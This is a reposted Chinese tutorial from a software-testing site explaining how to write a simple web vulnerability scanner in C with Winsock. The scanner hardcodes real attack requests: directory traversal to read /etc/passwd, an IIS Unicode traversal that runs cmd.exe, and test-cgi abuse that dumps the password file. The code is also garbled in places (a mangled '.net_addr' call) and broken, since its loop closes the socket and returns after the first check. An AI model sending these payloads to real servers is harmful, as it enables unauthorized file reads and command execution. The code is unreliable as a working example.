• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

编写漏洞扫描器

发布: 2007-7-14 21:11 | 作者: 佚名    | 来源: 网络转载     | 查看: 51次 | 进入软件测试论坛讨论

领测软件测试网 一、漏洞扫描器基本原理:  

编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用80端口,然后对这个端口发送一个GET文件的请求,服务器接收到请求会返回文件内容,如果文件不存在则返回一个错误提示,通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数send()和recv(),另外对流中存在的字符串进行判断需要使用函数strstr(),这除了需要具备socket函数库的知识以外,还需要一些有关string函数库的知识。  

二、简单的漏洞扫描源代码:  

/********************************************/  
/* 端口扫描器 源代码 */  
/* CgiScanner.cpp */  
/********************************************/  

#include <stdio.h>  
#include <string.h>  
#include <winsock.h>  

int main(int argc,char *argv[])  
{  
if(argc!=2){  
printf("Useage : scan [IP address]\n");  
return(1);  
}  

struct sockaddr_in blah;  
struct hostent *he;  
WSADATA wsaData;  
int i;  
WORD wVersionRequested;  
SOCKET sock;  

char buff[1024];  
char *ex[10];  
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";  
ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";  
ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";  
ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";  
ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";  
ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";  
char *fmsg="HTTP/1.1 200 OK";  

wVersionRequested = MAKEWORD( 1, 1 );  
if (WSAStartup(wVersionRequested , &wsaData)){  
printf("Winsock Initialization failed.\n");  
exit(1);  
}  

if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){  
printf("Can not create socket.\n");  
exit(1);  
}  
sock = socket(AF_INET,SOCK_STREAM,0);  
blah.sin_family = AF_INET;  
blah.sin_port = htons(80);  
blah.sin_addr.s_addr= .net_addr(argv[1]);  

if ((he=gethostbyname(argv[1]))!=NULL){  
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);  
}  
else{  
if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
WSACleanup();  
exit(1);  
}  
}  

for (i=1 ; i<7; i++) {
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,ex[i],strlen(ex[i]),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound :%s\n", ex[i]);
}
}

closesocket(sock);
WSACleanup();
return(1);
}
}

这段代码可以检测六个漏洞,读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁,概括起来这段程序完成了一下四项工作:

1、连接目标主机SERVER;
2、向目标主机发送GET请求;
3、接收目标返回数据;
4、根据返回数据判断文件是否存在。

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/

软件测试论坛

领测软件测试网最新更新
软件测试技术相关文章

软件测试培训信息
最新软件测试技术专题
最新领测软件测试网新闻
软件测试技术文章排行榜
  • 编辑推荐
  • 周排行
  • 月排行
软件测试技术分类最新内容
关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网